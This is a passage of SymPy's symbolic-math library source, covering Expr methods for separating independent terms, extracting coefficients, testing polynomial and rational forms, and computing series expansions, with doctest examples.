>>> (2*x*sin(x) + y + x + z).as_independent(x)
(y + z, 2*x*sin(x) + x)
>>> (2*x*sin(x) + y + x + z).as_independent(x, y)
(z, 2*x*sin(x) + x + y)
-- self is a Mul
>>> (x*sin(x)*cos(y)).as_independent(x)
(cos(y), x*sin(x))
non-commutative terms cannot always be separated out when self is a Mul
>>> from sympy import symbols
>>> n1, n2, n3 = symbols('n1 n2 n3', commutative=False)
>>> (n1 + n1*n2).as_independent(n2)
(n1, n1*n2)
>>> (n2*n1 + n1*n2).as_independent(n2)
(0, n1*n2 + n2*n1)
>>> (n1*n2*n3).as_independent(n1)
(1, n1*n2*n3)
>>> (n1*n2*n3).as_independent(n2)
(n1, n2*n3)
>>> ((x-n1)*(x-y)).as_independent(x)
(1, (x - y)*(x - n1))
-- self is anything else:
>>> (sin(x)).as_independent(x)
(1, sin(x))
>>> (sin(x)).as_independent(y)
(sin(x), 1)
>>> exp(x+y).as_independent(x)
(1, exp(x + y))
-- force self to be treated as an Add:
>>> (3*x).as_independent(x, as_Add=True)
(0, 3*x)
-- force self to be treated as a Mul:
>>> (3+x).as_independent(x, as_Add=False)
(1, x + 3)
>>> (-3+x).as_independent(x, as_Add=False)
(1, x - 3)
Note how the below differs from the above in making the
constant on the dep term positive.
>>> (y*(-3+x)).as_independent(x)
(y, x - 3)
-- use .as_independent() for true independence testing instead
of .has(). The former considers only symbols in the free
symbols while the latter considers all symbols
>>> from sympy import Integral
>>> I = Integral(x, (x, 1, 2))
>>> I.has(x)
True
>>> x in I.free_symbols
False
>>> I.as_independent(x) == (I, 1)
True
>>> (I + x).as_independent(x) == (I, x)
True
Note: when trying to get independent terms, a separation method
might need to be used first. In this case, it is important to keep
track of what you send to this routine so you know how to interpret
the returned values
>>> from sympy import separatevars, log
>>> separatevars(exp(x+y)).as_independent(x)
(exp(y), exp(x))
>>> (x + x*y).as_independent(y)
(x, x*y)
>>> separatevars(x + x*y).as_independent(y)
(x, y + 1)
>>> (x*(1 + y)).as_independent(y)
(x, y + 1)
>>> (x*(1 + y)).expand(mul=True).as_independent(y)
(x, x*y)
>>> a, b=symbols('a b', positive=True)
>>> (log(a*b).expand(log=True)).as_independent(b)
(log(a), log(b))
See Also
========
.separatevars(), .expand(log=True), Add.as_two_terms(),
Mul.as_two_terms(), .as_coeff_add(), .as_coeff_mul()
"""
from .symbol import Symbol
from .add import _unevaluated_Add
from .mul import _unevaluated_Mul
from sympy.utilities.iterables import sift
if self.is_zero:
return S.Zero, S.Zero
func = self.func
if hint.get('as_Add', func is Add):
want = Add
else:
want = Mul
if func is not want and (func is Add or func is Mul):
return (want.identity, self)
# sift out deps into symbolic and other and ignore
# all symbols but those that are in the free symbols
sym = set()
other = []
for d in deps:
if isinstance(d, Symbol): # Symbol.is_Symbol is True
sym.add(d)
else:
other.append(d)
def has(e):
"""return the standard has() if there are no literal symbols, else
check to see that symbol-deps are in the free symbols."""
has_other = e.has(*other)
if not sym:
return has_other
return has_other or e.has(*(e.free_symbols & sym))
if (want is not func or
func is not Add and func is not Mul):
if has(self):
return (want.identity, self)
else:
return (self, want.identity)
else:
if func is Add:
args = list(self.args)
else:
args, nc = self.args_cnc()
d = sift(args, lambda x: has(x))
depend = d[True]
indep = d[False]
if func is Add: # all terms were treated as commutative
return (Add(*indep), _unevaluated_Add(*depend))
else: # handle noncommutative by stopping at first dependent term
for i, n in enumerate(nc):
if has(n):
depend.extend(nc[i:])
break
indep.append(n)
return Mul(*indep), (
Mul(*depend, evaluate=False) if nc else
_unevaluated_Mul(*depend))
def as_real_imag(self, deep=True, **hints):
"""Performs complex expansion on 'self' and returns a tuple
containing collected both real and imaginary parts. This
method can't be confused with re() and im() functions,
which does not perform complex expansion at evaluation.
However it is possible to expand both re() and im()
functions and get exactly the same results as with
a single call to this function.
>>> from sympy import symbols, I
>>> x, y = symbols('x,y', real=True)
>>> (x + y*I).as_real_imag()
(x, y)
>>> from sympy.abc import z, w
>>> (z + w*I).as_real_imag()
(re(z) - im(w), re(w) + im(z))
"""
from sympy import im, re
if hints.get('ignore') == self:
return None
else:
return (re(self), im(self))
def as_powers_dict(self):
"""Return self as a dictionary of factors with each factor being
treated as a power. The keys are the bases of the factors and the
values, the corresponding exponents. The resulting dictionary should
be used with caution if the expression is a Mul and contains non-
commutative factors since the order that they appeared will be lost in
the dictionary."""
d = defaultdict(int)
d.update(dict([self.as_base_exp()]))
return d
def as_coefficients_dict(self):
"""Return a dictionary mapping terms to their Rational coefficient.
Since the dictionary is a defaultdict, inquiries about terms which
were not present will return a coefficient of 0. If an expression is
not an Add it is considered to have a single term.
Examples
========
>>> from sympy.abc import a, x
>>> (3*x + a*x + 4).as_coefficients_dict()
{1: 4, x: 3, a*x: 1}
>>> _[a]
0
>>> (3*a*x).as_coefficients_dict()
{a*x: 3}
"""
c, m = self.as_coeff_Mul()
if not c.is_Rational:
c = S.One
m = self
d = defaultdict(int)
d.update({m: c})
return d
def as_base_exp(self):
# a -> b ** e
return self, S.One
def as_coeff_mul(self, *deps, **kwargs):
"""Return the tuple (c, args) where self is written as a Mul, ``m``.
c should be a Rational multiplied by any terms of the Mul that are
independent of deps.
args should be a tuple of all other terms of m; args is empty
if self is a Number or if self is independent of deps (when given).
This should be used when you don't know if self is a Mul or not but
you want to treat self as a Mul or if you want to process the
individual arguments of the tail of self as a Mul.
- if you know self is a Mul and want only the head, use self.args[0];
- if you don't want to process the arguments of the tail but need the
tail then use self.as_two_terms() which gives the head and tail;
- if you want to split self into an independent and dependent parts
use ``self.as_independent(*deps)``
>>> from sympy import S
>>> from sympy.abc import x, y
>>> (S(3)).as_coeff_mul()
(3, ())
>>> (3*x*y).as_coeff_mul()
(3, (x, y))
>>> (3*x*y).as_coeff_mul(x)
(3*y, (x,))
>>> (3*y).as_coeff_mul(x)
(3*y, ())
"""
if deps:
if not self.has(*deps):
return self, tuple()
return S.One, (self,)
def as_coeff_add(self, *deps):
"""Return the tuple (c, args) where self is written as an Add, ``a``.
c should be a Rational added to any terms of the Add that are
independent of deps.
args should be a tuple of all other terms of ``a``; args is empty
if self is a Number or if self is independent of deps (when given).
This should be used when you don't know if self is an Add or not but
you want to treat self as an Add or if you want to process the
individual arguments of the tail of self as an Add.
- if you know self is an Add and want only the head, use self.args[0];
- if you don't want to process the arguments of the tail but need the
tail then use self.as_two_terms() which gives the head and tail.
- if you want to split self into an independent and dependent parts
use ``self.as_independent(*deps)``
>>> from sympy import S
>>> from sympy.abc import x, y
>>> (S(3)).as_coeff_add()
(3, ())
>>> (3 + x).as_coeff_add()
(3, (x,))
>>> (3 + x + y).as_coeff_add(x)
(y + 3, (x,))
>>> (3 + y).as_coeff_add(x)
(y + 3, ())
"""
if deps:
if not self.has(*deps):
return self, tuple()
return S.Zero, (self,)
def primitive(self):
"""Return the positive Rational that can be extracted non-recursively
from every term of self (i.e., self is treated like an Add). This is
like the as_coeff_Mul() method but primitive always extracts a positive
Rational (never a negative or a Float).
Examples
========
>>> from sympy.abc import x
>>> (3*(x + 1)**2).primitive()
(3, (x + 1)**2)
>>> a = (6*x + 2); a.primitive()
(2, 3*x + 1)
>>> b = (x/2 + 3); b.primitive()
(1/2, x + 6)
>>> (a*b).primitive() == (1, a*b)
True
"""
if not self:
return S.One, S.Zero
c, r = self.as_coeff_Mul(rational=True)
if c.is_negative:
c, r = -c, -r
return c, r
def as_content_primitive(self, radical=False, clear=True):
"""This method should recursively remove a Rational from all arguments
and return that (content) and the new self (primitive). The content
should always be positive and ``Mul(*foo.as_content_primitive()) == foo``.
The primitive need no be in canonical form and should try to preserve
the underlying structure if possible (i.e. expand_mul should not be
applied to self).
Examples
========
>>> from sympy import sqrt
>>> from sympy.abc import x, y, z
>>> eq = 2 + 2*x + 2*y*(3 + 3*y)
The as_content_primitive function is recursive and retains structure:
>>> eq.as_content_primitive()
(2, x + 3*y*(y + 1) + 1)
Integer powers will have Rationals extracted from the base:
>>> ((2 + 6*x)**2).as_content_primitive()
(4, (3*x + 1)**2)
>>> ((2 + 6*x)**(2*y)).as_content_primitive()
(1, (2*(3*x + 1))**(2*y))
Terms may end up joining once their as_content_primitives are added:
>>> ((5*(x*(1 + y)) + 2*x*(3 + 3*y))).as_content_primitive()
(11, x*(y + 1))
>>> ((3*(x*(1 + y)) + 2*x*(3 + 3*y))).as_content_primitive()
(9, x*(y + 1))
>>> ((3*(z*(1 + y)) + 2.0*x*(3 + 3*y))).as_content_primitive()
(1, 6.0*x*(y + 1) + 3*z*(y + 1))
>>> ((5*(x*(1 + y)) + 2*x*(3 + 3*y))**2).as_content_primitive()
(121, x**2*(y + 1)**2)
>>> ((5*(x*(1 + y)) + 2.0*x*(3 + 3*y))**2).as_content_primitive()
(1, 121.0*x**2*(y + 1)**2)
Radical content can also be factored out of the primitive:
>>> (2*sqrt(2) + 4*sqrt(10)).as_content_primitive(radical=True)
(2, sqrt(2)*(1 + 2*sqrt(5)))
If clear=False (default is True) then content will not be removed
from an Add if it can be distributed to leave one or more
terms with integer coefficients.
>>> (x/2 + y).as_content_primitive()
(1/2, x + 2*y)
>>> (x/2 + y).as_content_primitive(clear=False)
(1, x/2 + y)
"""
return S.One, self
def as_numer_denom(self):
""" expression -> a/b -> a, b
This is just a stub that should be defined by
an object's class methods to get anything else.
See Also
========
normal: return a/b instead of a, b
"""
return self, S.One
def normal(self):
n, d = self.as_numer_denom()
if d is S.One:
return n
return n/d
def extract_multiplicatively(self, c):
"""Return None if it's not possible to make self in the form
c * something in a nice way, i.e. preserving the properties
of arguments of self.
>>> from sympy import symbols, Rational
>>> x, y = symbols('x,y', real=True)
>>> ((x*y)**3).extract_multiplicatively(x**2 * y)
x*y**2
>>> ((x*y)**3).extract_multiplicatively(x**4 * y)
>>> (2*x).extract_multiplicatively(2)
x
>>> (2*x).extract_multiplicatively(3)
>>> (Rational(1, 2)*x).extract_multiplicatively(3)
x/6
"""
c = sympify(c)
if self is S.NaN:
return None
if c is S.One:
return self
elif c == self:
return S.One
if c.is_Add:
cc, pc = c.primitive()
if cc is not S.One:
c = Mul(cc, pc, evaluate=False)
if c.is_Mul:
a, b = c.as_two_terms()
x = self.extract_multiplicatively(a)
if x is not None:
return x.extract_multiplicatively(b)
quotient = self / c
if self.is_Number:
if self is S.Infinity:
if c.is_positive:
return S.Infinity
elif self is S.NegativeInfinity:
if c.is_negative:
return S.Infinity
elif c.is_positive:
return S.NegativeInfinity
elif self is S.ComplexInfinity:
if not c.is_zero:
return S.ComplexInfinity
elif self.is_Integer:
if not quotient.is_Integer:
return None
elif self.is_positive and quotient.is_negative:
return None
else:
return quotient
elif self.is_Rational:
if not quotient.is_Rational:
return None
elif self.is_positive and quotient.is_negative:
return None
else:
return quotient
elif self.is_Float:
if not quotient.is_Float:
return None
elif self.is_positive and quotient.is_negative:
return None
else:
return quotient
elif self.is_NumberSymbol or self.is_Symbol or self is S.ImaginaryUnit:
if quotient.is_Mul and len(quotient.args) == 2:
if quotient.args[0].is_Integer and quotient.args[0].is_positive and quotient.args[1] == self:
return quotient
elif quotient.is_Integer and c.is_Number:
return quotient
elif self.is_Add:
cs, ps = self.primitive()
if cs is not S.One:
return Mul(cs, ps, evaluate=False).extract_multiplicatively(c)
newargs = []
for arg in self.args:
newarg = arg.extract_multiplicatively(c)
if newarg is not None:
newargs.append(newarg)
else:
return None
return Add(*newargs)
elif self.is_Mul:
args = list(self.args)
for i, arg in enumerate(args):
newarg = arg.extract_multiplicatively(c)
if newarg is not None:
args[i] = newarg
return Mul(*args)
elif self.is_Pow:
if c.is_Pow and c.base == self.base:
new_exp = self.exp.extract_additively(c.exp)
if new_exp is not None:
return self.base ** (new_exp)
elif c == self.base:
new_exp = self.exp.extract_additively(1)
if new_exp is not None:
return self.base ** (new_exp)
def extract_additively(self, c):
"""Return self - c if it's possible to subtract c from self and
make all matching coefficients move towards zero, else return None.
Examples
========
>>> from sympy.abc import x, y
>>> e = 2*x + 3
>>> e.extract_additively(x + 1)
x + 2
>>> e.extract_additively(3*x)
>>> e.extract_additively(4)
>>> (y*(x + 1)).extract_additively(x + 1)
>>> ((x + 1)*(x + 2*y + 1) + 3).extract_additively(x + 1)
(x + 1)*(x + 2*y) + 3
Sometimes auto-expansion will return a less simplified result
than desired; gcd_terms might be used in such cases:
>>> from sympy import gcd_terms
>>> (4*x*(y + 1) + y).extract_additively(x)
4*x*(y + 1) + x*(4*y + 3) - x*(4*y + 4) + y
>>> gcd_terms(_)
x*(4*y + 3) + y
See Also
========
extract_multiplicatively
coeff
as_coefficient
"""
c = sympify(c)
if self is S.NaN:
return None
if c is S.Zero:
return self
elif c == self:
return S.Zero
elif self is S.Zero:
return None
if self.is_Number:
if not c.is_Number:
return None
co = self
diff = co - c
# XXX should we match types? i.e should 3 - .1 succeed?
if (co > 0 and diff > 0 and diff < co or
co < 0 and diff < 0 and diff > co):
return diff
return None
if c.is_Number:
co, t = self.as_coeff_Add()
xa = co.extract_additively(c)
if xa is None:
return None
return xa + t
# handle the args[0].is_Number case separately
# since we will have trouble looking for the coeff of
# a number.
if c.is_Add and c.args[0].is_Number:
# whole term as a term factor
co = self.coeff(c)
xa0 = (co.extract_additively(1) or 0)*c
if xa0:
diff = self - co*c
return (xa0 + (diff.extract_additively(c) or diff)) or None
# term-wise
h, t = c.as_coeff_Add()
sh, st = self.as_coeff_Add()
xa = sh.extract_additively(h)
if xa is None:
return None
xa2 = st.extract_additively(t)
if xa2 is None:
return None
return xa + xa2
# whole term as a term factor
co = self.coeff(c)
xa0 = (co.extract_additively(1) or 0)*c
if xa0:
diff = self - co*c
return (xa0 + (diff.extract_additively(c) or diff)) or None
# term-wise
coeffs = []
for a in Add.make_args(c):
ac, at = a.as_coeff_Mul()
co = self.coeff(at)
if not co:
return None
coc, cot = co.as_coeff_Add()
xa = coc.extract_additively(ac)
if xa is None:
return None
self -= co*at
coeffs.append((cot + xa)*at)
coeffs.append(self)
return Add(*coeffs)
def could_extract_minus_sign(self):
"""Canonical way to choose an element in the set {e, -e} where
e is any expression. If the canonical element is e, we have
e.could_extract_minus_sign() == True, else
e.could_extract_minus_sign() == False.
For any expression, the set ``{e.could_extract_minus_sign(),
(-e).could_extract_minus_sign()}`` must be ``{True, False}``.
>>> from sympy.abc import x, y
>>> (x-y).could_extract_minus_sign() != (y-x).could_extract_minus_sign()
True
"""
negative_self = -self
self_has_minus = (self.extract_multiplicatively(-1) is not None)
negative_self_has_minus = (
(negative_self).extract_multiplicatively(-1) is not None)
if self_has_minus != negative_self_has_minus:
return self_has_minus
else:
if self.is_Add:
# We choose the one with less arguments with minus signs
all_args = len(self.args)
negative_args = len([False for arg in self.args if arg.could_extract_minus_sign()])
positive_args = all_args - negative_args
if positive_args > negative_args:
return False
elif positive_args < negative_args:
return True
elif self.is_Mul:
# We choose the one with an odd number of minus signs
num, den = self.as_numer_denom()
args = Mul.make_args(num) + Mul.make_args(den)
arg_signs = [arg.could_extract_minus_sign() for arg in args]
negative_args = list(filter(None, arg_signs))
return len(negative_args) % 2 == 1
# As a last resort, we choose the one with greater value of .sort_key()
return bool(self.sort_key() < negative_self.sort_key())
def extract_branch_factor(self, allow_half=False):
"""
Try to write self as ``exp_polar(2*pi*I*n)*z`` in a nice way.
Return (z, n).
>>> from sympy import exp_polar, I, pi
>>> from sympy.abc import x, y
>>> exp_polar(I*pi).extract_branch_factor()
(exp_polar(I*pi), 0)
>>> exp_polar(2*I*pi).extract_branch_factor()
(1, 1)
>>> exp_polar(-pi*I).extract_branch_factor()
(exp_polar(I*pi), -1)
>>> exp_polar(3*pi*I + x).extract_branch_factor()
(exp_polar(x + I*pi), 1)
>>> (y*exp_polar(-5*pi*I)*exp_polar(3*pi*I + 2*pi*x)).extract_branch_factor()
(y*exp_polar(2*pi*x), -1)
>>> exp_polar(-I*pi/2).extract_branch_factor()
(exp_polar(-I*pi/2), 0)
If allow_half is True, also extract exp_polar(I*pi):
>>> exp_polar(I*pi).extract_branch_factor(allow_half=True)
(1, 1/2)
>>> exp_polar(2*I*pi).extract_branch_factor(allow_half=True)
(1, 1)
>>> exp_polar(3*I*pi).extract_branch_factor(allow_half=True)
(1, 3/2)
>>> exp_polar(-I*pi).extract_branch_factor(allow_half=True)
(1, -1/2)
"""
from sympy import exp_polar, pi, I, ceiling, Add
n = S(0)
res = S(1)
args = Mul.make_args(self)
exps = []
for arg in args:
if arg.func is exp_polar:
exps += [arg.exp]
else:
res *= arg
piimult = S(0)
extras = []
while exps:
exp = exps.pop()
if exp.is_Add:
exps += exp.args
continue
if exp.is_Mul:
coeff = exp.as_coefficient(pi*I)
if coeff is not None:
piimult += coeff
continue
extras += [exp]
if not piimult.free_symbols:
coeff = piimult
tail = ()
else:
coeff, tail = piimult.as_coeff_add(*piimult.free_symbols)
# round down to nearest multiple of 2
branchfact = ceiling(coeff/2 - S(1)/2)*2
n += branchfact/2
c = coeff - branchfact
if allow_half:
nc = c.extract_additively(1)
if nc is not None:
n += S(1)/2
c = nc
newexp = pi*I*Add(*((c, ) + tail)) + Add(*extras)
if newexp != 0:
res *= exp_polar(newexp)
return res, n
def _eval_is_polynomial(self, syms):
if self.free_symbols.intersection(syms) == set([]):
return True
return False
def is_polynomial(self, *syms):
"""
Return True if self is a polynomial in syms and False otherwise.
This checks if self is an exact polynomial in syms. This function
returns False for expressions that are "polynomials" with symbolic
exponents. Thus, you should be able to apply polynomial algorithms to
expressions for which this returns True, and Poly(expr, \*syms) should
work if and only if expr.is_polynomial(\*syms) returns True. The
polynomial does not have to be in expanded form. If no symbols are
given, all free symbols in the expression will be used.
This is not part of the assumptions system. You cannot do
Symbol('z', polynomial=True).
Examples
========
>>> from sympy import Symbol
>>> x = Symbol('x')
>>> ((x**2 + 1)**4).is_polynomial(x)
True
>>> ((x**2 + 1)**4).is_polynomial()
True
>>> (2**x + 1).is_polynomial(x)
False
>>> n = Symbol('n', nonnegative=True, integer=True)
>>> (x**n + 1).is_polynomial(x)
False
This function does not attempt any nontrivial simplifications that may
result in an expression that does not appear to be a polynomial to
become one.
>>> from sympy import sqrt, factor, cancel
>>> y = Symbol('y', positive=True)
>>> a = sqrt(y**2 + 2*y + 1)
>>> a.is_polynomial(y)
False
>>> factor(a)
y + 1
>>> factor(a).is_polynomial(y)
True
>>> b = (y**2 + 2*y + 1)/(y + 1)
>>> b.is_polynomial(y)
False
>>> cancel(b)
y + 1
>>> cancel(b).is_polynomial(y)
True
See also .is_rational_function()
"""
if syms:
syms = set(map(sympify, syms))
else:
syms = self.free_symbols
if syms.intersection(self.free_symbols) == set([]):
# constant polynomial
return True
else:
return self._eval_is_polynomial(syms)
def _eval_is_rational_function(self, syms):
if self.free_symbols.intersection(syms) == set([]):
return True
return False
def is_rational_function(self, *syms):
"""
Test whether function is a ratio of two polynomials in the given
symbols, syms. When syms is not given, all free symbols will be used.
The rational function does not have to be in expanded or in any kind of
canonical form.
This function returns False for expressions that are "rational
functions" with symbolic exponents. Thus, you should be able to call
.as_numer_denom() and apply polynomial algorithms to the result for
expressions for which this returns True.
This is not part of the assumptions system. You cannot do
Symbol('z', rational_function=True).
Examples
========
>>> from sympy import Symbol, sin
>>> from sympy.abc import x, y
>>> (x/y).is_rational_function()
True
>>> (x**2).is_rational_function()
True
>>> (x/sin(y)).is_rational_function(y)
False
>>> n = Symbol('n', integer=True)
>>> (x**n + 1).is_rational_function(x)
False
This function does not attempt any nontrivial simplifications that may
result in an expression that does not appear to be a rational function
to become one.
>>> from sympy import sqrt, factor
>>> y = Symbol('y', positive=True)
>>> a = sqrt(y**2 + 2*y + 1)/y
>>> a.is_rational_function(y)
False
>>> factor(a)
(y + 1)/y
>>> factor(a).is_rational_function(y)
True
See also is_algebraic_expr().
"""
if self in [S.NaN, S.Infinity, -S.Infinity, S.ComplexInfinity]:
return False
if syms:
syms = set(map(sympify, syms))
else:
syms = self.free_symbols
if syms.intersection(self.free_symbols) == set([]):
# constant rational function
return True
else:
return self._eval_is_rational_function(syms)
def _eval_is_algebraic_expr(self, syms):
if self.free_symbols.intersection(syms) == set([]):
return True
return False
def is_algebraic_expr(self, *syms):
"""
This tests whether a given expression is algebraic or not, in the
given symbols, syms. When syms is not given, all free symbols
will be used. The rational function does not have to be in expanded
or in any kind of canonical form.
This function returns False for expressions that are "algebraic
expressions" with symbolic exponents. This is a simple extension to the
is_rational_function, including rational exponentiation.
Examples
========
>>> from sympy import Symbol, sqrt
>>> x = Symbol('x', real=True)
>>> sqrt(1 + x).is_rational_function()
False
>>> sqrt(1 + x).is_algebraic_expr()
True
This function does not attempt any nontrivial simplifications that may
result in an expression that does not appear to be an algebraic
expression to become one.
>>> from sympy import exp, factor
>>> a = sqrt(exp(x)**2 + 2*exp(x) + 1)/(exp(x) + 1)
>>> a.is_algebraic_expr(x)
False
>>> factor(a).is_algebraic_expr()
True
See Also
========
is_rational_function()
References
==========
- http://en.wikipedia.org/wiki/Algebraic_expression
"""
if syms:
syms = set(map(sympify, syms))
else:
syms = self.free_symbols
if syms.intersection(self.free_symbols) == set([]):
# constant algebraic expression
return True
else:
return self._eval_is_algebraic_expr(syms)
###################################################################################
##################### SERIES, LEADING TERM, LIMIT, ORDER METHODS ##################
###################################################################################
def series(self, x=None, x0=0, n=6, dir="+", logx=None):
"""
Series expansion of "self" around ``x = x0`` yielding either terms of
the series one by one (the lazy series given when n=None), else
all the terms at once when n != None.
Returns the series expansion of "self" around the point ``x = x0``
with respect to ``x`` up to ``O((x - x0)**n, x, x0)`` (default n is 6).
If ``x=None`` and ``self`` is univariate, the univariate symbol will
be supplied, otherwise an error will be raised.
>>> from sympy import cos, exp
>>> from sympy.abc import x, y
>>> cos(x).series()
1 - x**2/2 + x**4/24 + O(x**6)
>>> cos(x).series(n=4)
1 - x**2/2 + O(x**4)
>>> cos(x).series(x, x0=1, n=2)
cos(1) - (x - 1)*sin(1) + O((x - 1)**2, (x, 1))
>>> e = cos(x + exp(y))
>>> e.series(y, n=2)
cos(x + 1) - y*sin(x + 1) + O(y**2)
>>> e.series(x, n=2)
cos(exp(y)) - x*sin(exp(y)) + O(x**2)
If ``n=None`` then a generator of the series terms will be returned.
>>> term=cos(x).series(n=None)
>>> [next(term) for i in range(2)]
[1, -x**2/2]
For ``dir=+`` (default) the series is calculated from the right and
for ``dir=-`` the series from the left. For smooth functions this
flag will not alter the results.
>>> abs(x).series(dir="+")
x
>>> abs(x).series(dir="-")
-x
"""
from sympy import collect, Dummy, Order, Rational, Symbol
if x is None:
syms = self.atoms(Symbol)
if not syms:
return self
elif len(syms) > 1:
raise ValueError('x must be given for multivariate functions.')
x = syms.pop()
if not self.has(x):
if n is None:
return (s for s in [self])
else:
return self
if len(dir) != 1 or dir not in '+-':
raise ValueError("Dir must be '+' or '-'")
if x0 in [S.Infinity, S.NegativeInfinity]:
dir = {S.Infinity: '+', S.NegativeInfinity: '-'}[x0]
s = self.subs(x, 1/x).series(x, n=n, dir=dir)
if n is None:
return (si.subs(x, 1/x) for si in s)
return s.subs(x, 1/x)
# use rep to shift origin to x0 and change sign (if dir is negative)
# and undo the process with rep2
if x0 or dir == '-':
if dir == '-':
rep = -x + x0
rep2 = -x
rep2b = x0
else:
rep = x + x0
rep2 = x
rep2b = -x0
s = self.subs(x, rep).series(x, x0=0, n=n, dir='+', logx=logx)
if n is None: # lseries...
return (si.subs(x, rep2 + rep2b) for si in s)
return s.subs(x, rep2 + rep2b)
# from here on it's x0=0 and dir='+' handling
if x.is_positive is x.is_negative is None or x.is_Symbol is not True:
# replace x with an x that has a positive assumption
xpos = Dummy('x', positive=True, finite=True)
rv = self.subs(x, xpos).series(xpos, x0, n, dir, logx=logx)
if n is None:
return (s.subs(xpos, x) for s in rv)
else:
return rv.subs(xpos, x)
if n is not None: # nseries handling
s1 = self._eval_nseries(x, n=n, logx=logx)
o = s1.getO() or S.Zero
if o:
# make sure the requested order is returned
ngot = o.getn()
if ngot > n:
# leave o in its current form (e.g. with x*log(x)) so
# it eats terms properly, then replace it below
if n != 0:
s1 += o.subs(x, x**Rational(n, ngot))
else:
s1 += Order(1, x)
elif ngot < n:
# increase the requested number of terms to get the desired
# number keep increasing (up to 9) until the received order
# is different than the original order and then predict how
# many additional terms are needed
for more in range(1, 9):
s1 = self._eval_nseries(x, n=n + more, logx=logx)
newn = s1.getn()
if newn != ngot:
ndo = n + (n - ngot)*more/(newn - ngot)
s1 = self._eval_nseries(x, n=ndo, logx=logx)
while s1.getn() < n:
s1 = self._eval_nseries(x, n=ndo, logx=logx)
ndo += 1
break
else:
raise ValueError('Could not calculate %s terms for %s'
% (str(n), self))
s1 += Order(x**n, x)
o = s1.getO()
s1 = s1.removeO()
else:
o = Order(x**n, x)
if (s1 + o).removeO() == s1:
o = S.Zero
try:
return collect(s1, x) + o
except NotImplementedError:
return s1 + o
else: # lseries handling
def yield_lseries(s):
"""Return terms of lseries one at a time."""
for si in s:
if not si.is_Add:
yield si
continue
# yield terms 1 at a time if possible
# by increasing order until all the
# terms have been returned
yielded = 0
o = Order(si, x)*x
ndid = 0
ndo = len(si.args)
while 1:
do = (si - yielded + o).removeO()
o *= x
if not do or do.is_Order:
continue
if do.is_Add:
ndid += len(do.args)
else:
ndid += 1
yield do
if ndid == ndo:
break
yielded += do
return yield_lseries(self.removeO()._eval_lseries(x, logx=logx))
def taylor_term(self, n, x, *previous_terms):
"""General method for the taylor term.
This method is slow, because it differentiates n-times. Subclasses can
redefine it to make it faster by using the "previous_terms".
"""
from sympy import Dummy, factorial
x = sympify(x)
_x = Dummy('x')
return self.subs(x, _x).diff(_x, n).subs(_x, x).subs(x, 0) * x**n / factorial(n)
def lseries(self, x=None, x0=0, dir='+', logx=None):
"""
Wrapper for series yielding an iterator of the terms of the series.
Note: an infinite series will yield an infinite iterator. The following,
for exaxmple, will never terminate. It will just keep printing terms
of the sin(x) series::
for term in sin(x).lseries(x):
print term
The advantage of lseries() over nseries() is that many times you are
just interested in the next term in the series (i.e. the first term for
example), but you don't know how many you should ask for in nseries()
using the "n" parameter.
See also nseries().
"""
return self.series(x, x0, n=None, dir=dir, logx=logx)
def _eval_lseries(self, x, logx=None):
# default implementation of lseries is using nseries(), and adaptively
# increasing the "n". As you can see, it is not very efficient, because
# we are calculating the series over and over again. Subclasses should
# override this method and implement much more efficient yielding of
# terms.
n = 0
series = self._eval_nseries(x, n=n, logx=logx)
if not series.is_Order:
if series.is_Add:
yield series.removeO()
else:
yield series
return
while series.is_Order:
n += 1
series = self._eval_nseries(x, n=n, logx=logx)
e = series.removeO()
yield e
while 1:
while 1:
n += 1
series = self._eval_nseries(x, n=n, logx=logx).removeO()
if e != series:
break
yield series - e
e = series
def nseries(self, x=None, x0=0, n=6, dir='+', logx=None):
"""
Wrapper to _eval_nseries if assumptions allow, else to series.
If x is given, x0 is 0, dir='+', and self has x, then _eval_nseries is
called. This calculates "n" terms in the innermost expressions and
then builds up the final series just by "cross-multiplying" everything
out.
The optional ``logx`` parameter can be used to replace any log(x) in the
returned series with a symbolic value to avoid evaluating log(x) at 0. A
symbol to use in place of log(x) should be provided.
Advantage -- it's fast, because we don't have to determine how many
terms we need to calculate in advance.
Disadvantage -- you may end up with less terms than you may have
expected, but the O(x**n) term appended will always be correct and
so the result, though perhaps shorter, will also be correct.
If any of those assumptions is not met, this is treated like a
wrapper to series which will try harder to return the correct
number of terms.
See also lseries().
Examples
========
>>> from sympy import sin, log, Symbol
>>> from sympy.abc import x, y
>>> sin(x).nseries(x, 0, 6)
x - x**3/6 + x**5/120 + O(x**6)
>>> log(x+1).nseries(x, 0, 5)
x - x**2/2 + x**3/3 - x**4/4 + O(x**5)
Handling of the ``logx`` parameter --- in the following example the
expansion fails since ``sin`` does not have an asymptotic expansion
at -oo (the limit of log(x) as x approaches 0):
>>> e = sin(log(x))
>>> e.nseries(x, 0, 6)
Traceback (most recent call last):
...
PoleError: ...
...
>>> logx = Symbol('logx')
>>> e.nseries(x, 0, 6, logx=logx)
sin(logx)
In the following example, the expansion works but gives only an Order term
unless the ``logx`` parameter is used:
>>> e = x**y
>>> e.nseries(x, 0, 2)
O(log(x)**2)
>>> e.nseries(x, 0, 2, logx=logx)
exp(logx*y)
"""
if x and not x in self.free_symbols:
return self
if x is None or x0 or dir != '+': # {see XPOS above} or (x.is_positive == x.is_negative == None):
return self.series(x, x0, n, dir)
else:
return self._eval_nseries(x, n=n, logx=logx)
def _eval_nseries(self, x, n, logx):
"""
Return terms of series for self up to O(x**n) at x=0
from the positive direction.
This is a method that should be overridden in subclasses. Users should
never call this method directly (use .nseries() instead), so you don't
have to write docstrings for _eval_nseries().
"""
from sympy.utilities.misc import filldedent
raise NotImplementedError(filldedent("""
The _eval_nseries method should be added to
%s to give terms up to O(x**n) at x=0
from the positive direction so it is available when
nseries calls it.""" % self.func)
)
def limit(self, x, xlim, dir='+'):
""" Compute limit x->xlim.
"""
from sympy.series.limits import limit
return limit(self, x, xlim, dir)
def compute_leading_term(self, x, logx=None):
"""
as_leading_term is only allowed for results of .series()
This is a wrapper to compute a series first.
"""
from sympy import Dummy, log
from sympy.series.gruntz import calculate_series
if self.removeO() == 0:
return self
if logx is None:
d = Dummy('logx')
s = calculate_series(self, x, d).subs(d, log(x))
else:
s = calculate_series(self, x, logx)
return s.as_leading_term(x)
@cacheit
def as_leading_term(self, *symbols):
"""
Returns the leading (nonzero) term of the series expansion of self.
The _eval_as_leading_term routines are used to do this, and they must
always return a non-zero value.
Examples
========
>>> from sympy.abc import x
>>> (1 + x + x**2).as_leading_term(x)
1
>>> (1/x**2 + x + x**2).as_leading_term(x)
x**(-2)
"""
from sympy import powsimp
if len(symbols) > 1:
c = self
for x in symbols:
c = c.as_leading_term(x)
return c
elif not symbols:
return self
x = sympify(symbols[0])
